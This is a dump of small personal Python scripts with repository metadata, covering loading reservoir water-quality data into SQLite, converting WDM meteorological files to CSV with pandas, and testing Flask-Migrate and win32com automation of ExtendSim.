Load_Data(file_name):\n data = genfromtxt(file_name, delimiter=',', skip_header=1, converters={0: lambda s: str(s)})\n return data.tolist()\n\nBase = declarative_base()\n\n\n\nclass Data(Base):\n __tablename__ = 'Aqueduct_test'\n __table_args__ = {'sqlite_autoincrement': True}\n id = Column(Integer, primary_key=True, nullable=False)\n year = Column(Integer)\n month = Column(Integer)\n res = Column(Float)\n solids = Column(Integer)#Bool\n NTU = Column(Integer)#Bool\n org_ml = Column(Integer)#Bool\n MPN_100ml = Column(Integer)#Bool\n MPN_100ml_1 = Column(Integer)#Bool\n LosR = Column(Float)\n Silica = Column(Float)\n Ca = Column(Float)\n Mg = Column(Float)\n Ca_Mg = Column(Float)\n NO3 = Column(Float)\n NO3_USGS = Column(Float)\n Cl2 = Column(Float)\n Na = Column(Float)\n SO4 = Column(Float)\n K = Column(Float)\n pH = Column(Float)\n Alk = Column(Float)\n Hard = Column(Float)\n Nhard = Column(Float)\n C_USGSTemp = Column(Float)\n F_USGS = Column(Float)\n Temp = Column(Float)\n MD_Precip_inch_mon = Column(Float)\n MD_Temp_F 
= Column(Float)\n\nif __name__ == \"__main__\":\n t = time()\n\n engine = create_engine('sqlite:///data/Aqueduct_test.db')\n Base.metadata.create_all(engine)\n\n session = sessionmaker()\n session.configure(bind=engine)\n s = session()\n\n\ntry:\n\n file_name = \"data/Reservoir_intake_retweaked.csv\"\n data = Load_Data(file_name)\n\n print(data)\n\n\n for i in data:\n record = Data(**{\n 'year' : i[1],\n 'month' : i[2],\n 'res' : i[3],\n 'solids' : i[4],\n 'NTU' : i[5],\n 'org_ml' : i[6],\n 'MPN_100ml' : i[7],\n 'MPN_100ml_1' : i[8],\n 'LosR' : i[9],\n 'Silica' : i[10],\n 'Ca' : i[11],\n 'Mg' : i[12],\n 'Ca_Mg' : i[13],\n 'NO3' : i[14],\n 'NO3_USGS' : i[15],\n 'Cl2' : i[16],\n 'Na' : i[17],\n 'SO4' : i[18],\n 'K' : i[19],\n 'pH' : i[20],\n 'Alk' : i[21],\n 'Hard' : i[22],\n 'Nhard' : i[23],\n 'C_USGSTemp' : i[24],\n 'F_USGS' : i[25],\n 'Temp' : i[26],\n 'MD_Precip_inch_mon' : i[27],\n 'MD_Temp_F' : i[28]\n })\n s.add(record)\n\n s.commit()\n print(\"success\")\nexcept:\n s.rollback()\n print(\"no good\")\nfinally:\n s.close()\n print(\"connection closed\")\nprint(\"Time elapsed: \" + str(time() - t) + \" s.\")\n" }, { "alpha_fraction": 0.5998803973197937, "alphanum_fraction": 0.6172248721122742, "avg_line_length": 21.013158798217773, "blob_id": "b0aa2967441c6615b8754a3995c0e1a0a2a1c63e", "content_id": "502dd26855f5ab589466457614be795d7a3a5a1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1672, "license_type": "no_license", "max_line_length": 104, "num_lines": 76, "path": "/wdm_scraps.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "#unused parts of wdm code\n\n\n#print(data_df)\n\n#print(data_df.index.month)\n\ndatetime_values = list(data_df.index.values) #.index.array)#\ncheck2 = data_df.iloc[7,0]\ndtr2 = datetime_values[0:5]\n\ndf_shape = data_df.shape\n\n\ndatetime_values_df = pd.DataFrame(datetime_values)\n\ndatetime_values_df.columns=[\"Date_Time\"]\n\n#print(datetime_values_df)\n\n#add rows to dataframe\n# data_df =pd.concat([data_df, datetime_values_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n# )], sort=False)\n\n\n\n\n#-------------formatting data\n\n#disable warning\npd.options.mode.chained_assignment = None # default='warn'\n\n\n\n\n#data_df['Datetime'] = []\n#\n# data_df['year'] = df[]\n\n\n# count = 0\n# for i in datetime_values:#dtr2:\n# #datetime object to string\n# dt = str(i)\n# # grabbing select parts of the datetime object for each entry in the data\n# year = dt[-29:-25]\n# month = dt[-24:-22]\n# day = dt[-21:-19]\n# hour = dt[-18:-16]\n#\n# #then assign each to respective column\n# data_df.iloc[count, data_df.columns.get_loc('year')] = year\n# data_df.iloc[count, data_df.columns.get_loc('month')] = month\n# data_df.iloc[count, data_df.columns.get_loc('day')] = day\n# data_df.iloc[count, data_df.columns.get_loc('hour')] = hour\n# #print(count)\n#\n# # data_df.iloc[count,3] = month\n# # data_df.iloc[count,4] = day\n# # data_df.iloc[count,5] = hour\n# count +=1\n\n# data_df.to_csv(output_folder +\"/\" + title + \".csv\")\n\n\n#print(dtr2)\n#print(df_shape)\n#print(datetime_values)\n#print(datetime_values_df)\n#print(data_df)\n\n# for col in data_df.columns:\n# print(col)\n\n#print(data_df.axes)\n#print(count)" }, { "alpha_fraction": 0.6119944453239441, "alphanum_fraction": 0.6227335929870605, "avg_line_length": 48.11643981933594, "blob_id": "42762f9bbc2f2dbe199a8c1cd2d7588208c120e7", "content_id": "a49d16adacb3484459adb3feb9466d9eae4d88c4", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7170, "license_type": "no_license", "max_line_length": 111, "num_lines": 146, "path": "/wdm.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from wdmtoolbox import wdmtoolbox\nimport glob\nimport pandas as pd\nfrom sys import platform\n\nif platform == \"linux\" or platform == \"linux2\":\n # linux\n pass\nelif platform == \"darwin\":\n # OS X\n\n # this is the directory where the raw wdm files are placed\n source_dir_met = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/input/met\"\n source_dir_prad = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/input/prad\"\n\n # create object containing all files in for met and prad\n allFiles1 = glob.glob(source_dir_met + \"/*met*.wdm*\")\n allFiles2 = glob.glob(source_dir_prad + \"/*prad*.wdm*\")\n\n # our file destintion\n output_folder = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/output\"\n #print(\"mac os\")\nelif platform == \"win32\":\n # Windows...\n\n #this is the directory where the raw wdm files are placed\n source_dir_met = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\input\\met\"\n source_dir_prad = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\input\\prad\"\n\n #create object containing all files in for met and prad\n allFiles1 = glob.glob(source_dir_met + \"/*met*.wdm*\")\n allFiles2 = glob.glob(source_dir_prad+ \"/*prad*.wdm*\")\n\n #our file destintion\n output_folder = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\output\"\n #print(\"win32 os\")\n\n#------------iterate through the met files---#\nfor file in allFiles1:\n\n\n#------------1000.PET-------------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1000)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n #output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".PET\")\n#-----------------------------------#\n\n#------------1001.DPT-----------------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1001)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".DPT\")\n#-----------------------------------#\n\n#----------------1002.WND--------------#\n # takes specific indexes from the right to include only 
the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1002)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".WND\")\n#----------------------------------#\n\n#--------------------1003.RAD------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1003)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".RAD\")\n#-----------------------------------#\n\n#--------------------1004.TMP------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1004)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n #output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".TMP\")\n#------------------------------------#\n#------------------------------------#\n\n#----------iterate through the prad files-------#\nfor file in allFiles2:\n\n#-------------------2000.PRC------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 2000)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder + \"/\" + title + \".PRC\")\n # 
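\n# A possible refactor (an illustrative addition, not part of the original\n# script): the six blocks above repeat the same extract / annotate / export\n# steps and could be collapsed into one helper; it is left commented out here\n# so the script's behaviour is unchanged.\n# def export_dsn(wdm_file, dsn, ext):\n#     title = wdm_file[-10:-4]\n#     df = wdmtoolbox.extract(wdm_file, dsn)\n#     for part in (\"year\", \"month\", \"day\", \"hour\"):\n#         df[part] = getattr(df.index, part)\n#     df.to_csv(output_folder + \"/\" + title + \".\" + ext)\n# for f in allFiles1:\n#     for dsn, ext in [(1000, \"PET\"), (1001, \"DPT\"), (1002, \"WND\"), (1003, \"RAD\"), (1004, \"TMP\")]:\n#         export_dsn(f, dsn, ext)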
------------------------------------#" }, { "alpha_fraction": 0.5003384947776794, "alphanum_fraction": 0.5267434120178223, "avg_line_length": 18.10389518737793, "blob_id": "e128d317f242be862becc3424a764b810ea25ce5", "content_id": "b8fec0caab4c96950daecd5c5fc7471548465b61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1477, "license_type": "no_license", "max_line_length": 65, "num_lines": 77, "path": "/test_2021.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "# print(\"it's been a while...\")\n#\n# test = (1,2,3)\n#\n# #print(test)\n#\n# def test_function(array):\n#\n# print(array)\n#\n# test_function(test)\n#\n# class test_class:\n# def __init__(self, test_value):\n# self.value = test_value\n#\n# test_instantiation = test_class(42)\n#\n# print(test_instantiation.value)\n\n# def test_func(n):\n# product=1\n# my_sum = 0\n# difference = 0\n# n_str = str(n)\n# for i in n_str:\n# product = int(i) * product\n# # print(product)\n# my_sum = int(i) + my_sum\n# # print(sum)\n# difference = product - my_sum\n# # print(difference)\n# return difference\n\n # print(int(i) * i[+1])\n #print((n*n) - (n+n))\n#\n# test_val = test_func(123456)\n# print(test_val)\n\n\n\n# def binaryPatternMatching(pattern, s):\n# vowels = ('a','e','i','o','u','y')\n# match_count = 0\n#\n#\n# if len(pattern) == len(s):\n# same_length = True\n# for i in str(pattern):\n# #if (len(i) == len(str(s[pattern.index(i)]))):\n#\n#\n# if (int(i) == 0) & (s[pattern.index(i)] in vowels):\n# vowel_match = True\n# #print('vowel match')\n# elif (int(i) == 1) & (s[pattern.index(i)] not in vowels):\n# cons_match = True\n# #print('con match')\n# match_count += 1\n#\n# else:\n# match = match\n# #print('no match')\n# #print(match_count)\n# return(match_count)\n#\n#\n#\n# result = binaryPatternMatching('1011','team')\n#\n# print(result)\n\nmat = [0,1,0,0],\n[1,1,1,0],\n[0,1,1,1],\n[0,0,1,0]\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 28, "blob_id": "522414cbf13cd3bed731c8cc2a7ae12bd9e254d2", "content_id": "789b4e20b257bf00387c2952ea06c339d109358a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 60, "num_lines": 3, "path": "/Interview_practice/Python_intertview_arrays.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "#question from 'Elements of Programming Interview in Python'\n#Chapter 5 pg. 
41\n#Arrays\n\n" }, { "alpha_fraction": 0.5533718466758728, "alphanum_fraction": 0.5807321667671204, "avg_line_length": 25.489795684814453, "blob_id": "713bb27864c0625acfd43784b9b4fa538dd716dd", "content_id": "762c2ba96c3ae26941b9336355f4ecbbeda53fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2595, "license_type": "no_license", "max_line_length": 117, "num_lines": 98, "path": "/migration_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom config import Config\n\nfrom numpy import genfromtxt\n\nimport os\n\n#basedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\n\napp.config.from_object(Config)\n#app.comfig['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////C/Users/icprbadmin/Documents/Python_Scripts/Workflow_py/test.db'\n\n#SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'test.db')\n\n#SQLALCHEMY_TRACK_MODIFICATIONS = False\n\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n\n#models\n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n year = db.Column(db.Integer)\n month = db.Column(db.Integer)\n res = db.Column(db.Integer)\n solids = db.Column(db.Integer)#Bool\n NTU = db.Column(db.Integer)#Bool\n org_mal = db.Column(db.Integer)#Bool\n MPN_100ml = db.Column(db.Integer)#Bool\n MPN_100ml_1 = db.Column(db.Integer)#Bool\n LosR = db.Column(db.Float)\n Silica = db.Column(db.Float)\n Ca = db.Column(db.Float)\n Mg = db.Column(db.Float)\n Ca_Mg = db.Column(db.Float)\n NO3 = db.Column(db.Float)\n NO3_USGS = db.Column(db.Float)\n Cl2 = db.Column(db.Float)\n Na = db.Column(db.Float)\n SO4 = db.Column(db.Float)\n K = db.Column(db.Float)\n pH = db.Column(db.Float)\n Alk = db.Column(db.Float)\n Hard = db.Column(db.Float)\n Nhard = db.Column(db.Float)\n C_USGSTemp = db.Column(db.Float)\n F_USGS = db.Column(db.Float)\n Temp = db.Column(db.Float)\n MD_Precip_inch_mon = db.Column(db.Float)\n MD_Temp_F = db.Column(db.Float)\n\n\ndef Load_Data(file_name):\n data = genfromtxt(file_name, delimiter=',', skip_header=1, converters={0: lambda s: str(s)})\n return data.tolist()\n\nfile_name = \"data/Reservoir_intake_retweaked.csv\"\ndata = Load_Data(file_name)\n\n#this needs to be adapted to flask-migrate structure\nfor i in data:\n record = Data(**{\n 'year': i[1],\n 'month': i[2],\n 'res': i[3],\n 'solids': i[4],\n 'NTU': i[5],\n 'org_ml': i[6],\n 'MPN_100ml': i[7],\n 'MPN_100ml_1': i[8],\n 'LosR': i[9],\n 'Silica': i[10],\n 'Ca': i[11],\n 'Mg': i[12],\n 'Ca_Mg': i[13],\n 'NO3': i[14],\n 'NO3_USGS': i[15],\n 'Cl2': i[16],\n 'Na': i[17],\n 'SO4': i[18],\n 'K': i[19],\n 'pH': i[20],\n 'Alk': i[21],\n 'Hard': i[22],\n 'Nhard': i[23],\n 'C_USGSTemp': i[24],\n 'F_USGS': i[25],\n 'Temp': i[26],\n 'MD_Precip_inch_mon': i[27],\n 'MD_Temp_F': i[28]\n })\n\n#print(record)" }, { "alpha_fraction": 0.5202822089195251, "alphanum_fraction": 0.5626102089881897, "avg_line_length": 23.69565200805664, "blob_id": "7e7cf98bcd569c21950cc8869d7b3662c30e2d43", "content_id": "cfeb61f1284d871c9df8241eb5b7ab400e9c9e65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 97, "num_lines": 23, "path": "/pandas_play.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ntest_data = {'t1': ['test1test','test2test'],\n 't2': ['testone','testtwo']\n 
}\n\n\ndata_df = pd.DataFrame(data=test_data)\n#print(data_df)\ndata_df['t3']= [data_df.iloc[0,0][-5:-4],data_df.iloc[1,0][-5:-4]]\n# test = data_df.iloc[0,1]\n# print(test)\n\ndata_df =pd.concat([data_df,pd.DataFrame(columns=(\"coltest1\", \"coltest2\") ##(columns=list('ABCD')\n )], sort=False)\n\nbutter = 333\n\ndata_df.iloc[0, data_df.columns.get_loc('t2')] = butter\n\ndata_df['coltest1'] = data_df['t1']\n\nprint(data_df)" }, { "alpha_fraction": 0.708563506603241, "alphanum_fraction": 0.7444751262664795, "avg_line_length": 23.16666603088379, "blob_id": "e95f7c52167375d0f4324a7c83221928083e9a60", "content_id": "f9d4b5cbf1af3e0e4216a89e10b8bd4ba450ca35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 71, "num_lines": 30, "path": "/win32com_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "import win32com.client\nimport win32gui as wg\nimport win32con\nimport time\n\nprog_ID = \"Extend.application\"\nwin_ID = \"ExtendSim\"\n\nes_handle = win32com.client.Dispatch(prog_ID)\nprint(es_handle)\n\napp_ID = wg.FindWindow(None, win_ID)\nprint(app_ID)\n\n#time.sleep(10)\n\nwg.ShowWindow(app_ID, win32con.SW_MAXIMIZE)\n#time.sleep(5)\nwg.ShowWindow(app_ID, win32con.SW_MAXIMIZE)\n#es_handle.Execute(\"\"\"ActivateApplication()\"\"\")\n\n#brings specified worksheet to forefront\n#es_handle.Execute(\"\"\"ActivateWorksheet(\"test_model.mox\")\"\"\")\n\n#set the run parameters SetEndTime, SetStartTime, SetNumSim, SetNumStep\n#es_handle.Execute(\"\"\" SetRunParameters(10000, 0 , 1, 1) \"\"\")\nes_handle.Execute(\"\"\"ShowFunction-Help(1)\"\"\")\n\n\n# python win32com_test.py" } ]
9
Jjrex8988/Python_Project_DS_Multiple_Linear_Regression
https://github.com/Jjrex8988/Python_Project_DS_Multiple_Linear_Regression
3e25d335d26786afe27947d7f92b9bb3b0493588
68adab00b67df0b47d712cd9bd52a4161be732bc
dde2d74ced67f8f1ee7a7b58787edf9e4c6214cf
refs/heads/master
2023-05-09T12:27:47.319942
2021-06-02T15:04:50
2021-06-02T15:04:50
373,208,973
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6676572561264038, "alphanum_fraction": 0.6958890557289124, "avg_line_length": 26.283782958984375, "blob_id": "8e2cdc88786d4ea85c9196e108384cf96327a537", "content_id": "afb7eca569236db1f77c80e9fe1c890f5c2c25c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2019, "license_type": "no_license", "max_line_length": 97, "num_lines": 74, "path": "/multiple_linear_regression_backward_elimination.py", "repo_name": "Jjrex8988/Python_Project_DS_Multiple_Linear_Regression", "src_encoding": "UTF-8", "text": "# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values\nprint(X)\nprint('-' * 38)\n\n# Encoding categorical data\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\n\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [3])], remainder='passthrough')\nX = np.array(ct.fit_transform(X))\nprint(X)\nprint('-' * 38)\n\n# Avoiding the Dummy Variable Trap (Backward Elimination)\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n# Training the Multiple Linear Regression model on the Training set\nfrom sklearn.linear_model import LinearRegression\n\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = regressor.predict(X_test)\n\n\n# Building a model (Backward Elimination)\nimport statsmodels.api as sm\n\nX = np.append(arr=np.ones((50, 1)).astype(int), values=X, axis=1)\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 1, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n" } ]
1
cabdi13/CTF-writeups
https://github.com/cabdi13/CTF-writeups
59689e24106dd025038357e99e88d84924ca60ac
51ff0c841b5096833f4242f5a5caaed3000cbe04
db6600e38518650f584bc83568dfae1497cc7bf8
refs/heads/main
2023-09-05T02:56:49.830937
2021-11-18T17:56:18
2021-11-18T17:56:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6602303385734558, "alphanum_fraction": 0.663279116153717, "avg_line_length": 37.33766174316406, "blob_id": "102be4459c28a12fa8616ddd21962b62e88cdab4", "content_id": "1504aeab1c389b6c453419c8266f5813328ce447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2952, "license_type": "permissive", "max_line_length": 258, "num_lines": 77, "path": "/HackTheBox/challenges/web/Gunship/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Gunship\nThis is a beautiful and simple node web application that contains only one user input And vulnerability \nmay be at this point.\n\n<p align=\"center\">\n<img src=\"./images/Screenshot.png\">\n</p>\n\nInspection of the source code reveals a comment that hints towards the exploit being caused by prototype pollution in unflatten.\n\n> unflatten seems outdated and a bit vulnerable to prototype pollution we sure hope so that po6ix doesn't pwn our puny app with his AST injection on template engines\n\n```js\nconst path = require('path');\nconst express = require('express');\nconst handlebars = require('handlebars');\nconst { unflatten } = require('flat');\nconst router = express.Router();\n\nrouter.get('/', (req, res) => {\n return res.sendFile(path.resolve('views/index.html'));\n});\n\nrouter.post('/api/submit', (req, res) => {\n\t// unflatten seems outdated and a bit vulnerable to prototype pollution\n\t// we sure hope so that po6ix doesn't pwn our puny app with his AST injection on template engines\n\n const { artist } = unflatten(req.body);\n\n\tif (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {\n\t\treturn res.json({\n\t\t\t'response': handlebars.compile('Hello {{ user }}, thank you for letting us know!')({ user:'guest' })\n\t\t});\n\t} else {\n\t\treturn res.json({\n\t\t\t'response': 'Please provide us with the full name of an existing member.'\n\t\t});\n\t}\n});\n\nmodule.exports = router;\n```\nSome google-fu leads us pretty quickly to the following site with a POC by posix on a protype pollution in AST : [AST Injection, Prototype Pollution to RCE](https://blog.p6.is/AST-Injection/#Exploit)\n\nThe proof of concept from the site above only required minor changes in order to get command execution. 
Note that bash is not available inside the docker container; we could use sh instead, but as we only need to grab the flag we can just use simple commands.\n\n\n```python\nimport requests\n\nURL = '[URL]'\n\n# make pollution\nr = requests.post(URL+'/api/submit', json = {\n    \"artist.name\":\"Gingell\",\n    \"__proto__.type\": \"Program\",\n    \"__proto__.body\": [{\n        \"type\": \"MustacheStatement\",\n        \"path\": 0,\n        \"params\": [{\n            \"type\": \"NumberLiteral\",\n            \"value\": \"process.mainModule.require('child_process').execSync(`whoami > /app/static/out`)\"\n        }],\n        \"loc\": {\n            \"start\": 0,\n            \"end\": 0\n        }\n    }]\n    })\nprint(requests.get(URL+'/static/out').text)\n```\n\nThe command execution is blind; however, as we know that the path to the static folder is `/app/static`, we can write files into this path and then request them to see the output.\n\nA quick `ls > /app/static/out` and browsing to `/static/out` shows that there is a flag in the current folder.\n\nChanging the command to `cat flag* > /app/static/out` and browsing to `/static/out` again gives us the flag : `HTB{wh3n_l1f3_******_***_**_*****_*********_****_*****}`\n" }, { "alpha_fraction": 0.6844589710235596, "alphanum_fraction": 0.7002542018890381, "avg_line_length": 24.48444366455078, "blob_id": "043a3642833a3c1268f1240c94fbc7ccaf454f0c", "content_id": "5e0cf8241af5d8c0ddde0138e4301f0098bbe69c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5517, "license_type": "permissive", "max_line_length": 140, "num_lines": 225, "path": "/HackTheBox/machines/Previse/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Previse\n\nThe first thing we're going to do is run an Nmap scan:\n```\nnmap -sC -sV [IP]\n```\n<p align=\"center\">\n<img src=\"./images/01.jpg\">\n</p>\n\nThe scan shows two open ports: `22` (SSH) and `80` (HTTP).\n\n<p align=\"center\">\n<img src=\"./images/02.jpg\">\n</p>\n\nNext, I used `gobuster` to brute-force directories and files.\n\n```bash\ngobuster dir -u http://10.10.11.104 -w ./directory-list-2.3-medium.txt -x php\n```\n\nA list of discovered routes can be found in the image below:\n\n<p align=\"center\">\n<img src=\"./images/03.jpg\">\n</p>\n\nWhile analyzing this output, I discovered an interesting page: `nav.php`.\n\nThrough it, I found that it is possible to `create an account` on the site.\n\n<p align=\"center\">\n<img src=\"./images/04.jpg\">\n</p>\n\nThe website allows the creation of accounts, but the page redirects to `login.php`.\n\nSo I created an account using a small trick, and I'll explain how I did it.\n\nTo begin, I opened `Burp Suite` and captured the account-creation request.\n\nNext, right-click the captured request, choose the `Do intercept` option, and click `Response to this request`.\n\n<p align=\"center\">\n<img src=\"./images/05.jpg\">\n</p>\n\nThen forward the request so that Burp intercepts its response.\n\nYou now see the response in Burp Suite; change the status code from `302` to `200 OK`. This way the browser receives the page content instead of following the redirect. 
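\n\nThe same bypass can also be scripted rather than done by hand in Burp Suite. Here is a rough sketch with Python requests; note that the endpoint path and form field names below are illustrative guesses, not values taken from the box:\n\n```python\nimport requests\n\n# Hypothetical registration endpoint and field names -- adjust them to\n# whatever the real form actually posts.\nr = requests.post(\n    'http://10.10.11.104/accounts.php',\n    data={'username': 'hacker', 'password': 'p@ssw0rd', 'confirm': 'p@ssw0rd'},\n    allow_redirects=False,  # the server processes the POST before it redirects\n)\nprint(r.status_code)\n```\n\nThe underlying idea is the same either way: the redirect to `login.php` only happens after the server has already handled the request.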
\n\n<p align=\"center\">\n<img src=\"./images/06.jpg\">\n</p>\n\nNow you can see that we can `create an account` on the website.\n\nCreate a username and password of your choice.\n\n<p align=\"center\">\n<img src=\"./images/07.jpg\">\n</p>\n\nNext, we log in to the website using that `username` and `password`.\n\n<p align=\"center\">\n<img src=\"./images/02.jpg\">\n</p>\n\n> Now we are successfully logged in to the site.\n\nNext, we click on the `file menu`, where we find `sitebackup.zip`, which looks interesting.\n\n<p align=\"center\">\n<img src=\"./images/08.jpg\">\n</p>\n\nDownload the file and extract it.\n\nWe get some interesting `PHP` files.\n\nAnalyzing them further, two files stand out: `config.php` and `logs.php`.\n\n```php\n<?php\n\nfunction connectDB(){\n    $host = 'localhost';\n    $user = 'root';\n    $passwd = 'mySQL_p@ssw0rd!:)';\n    $db = 'previse';\n    $mycon = new mysqli($host, $user, $passwd, $db);\n    return $mycon;\n}\n\n?>\n```\n`config.php` gives us the username and password for the MySQL database.\n\nThe other 